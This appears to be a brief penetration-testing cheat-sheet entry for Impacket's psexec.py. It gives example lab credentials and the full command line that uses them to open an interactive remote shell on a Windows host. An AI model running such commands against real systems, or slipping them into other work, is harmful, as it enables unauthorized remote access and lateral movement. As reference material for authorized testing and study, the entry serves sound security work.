Impacket’s psexec.py offers psexec like functionality. This will give you an interactive shell on the Windows host.
Command Reference:
Target IP: 10.10.10.1
Domain: test.local
Username: test
Password: Welkom01!
python3 psexec.py test.local/test:Welkom01!@10.10.10.1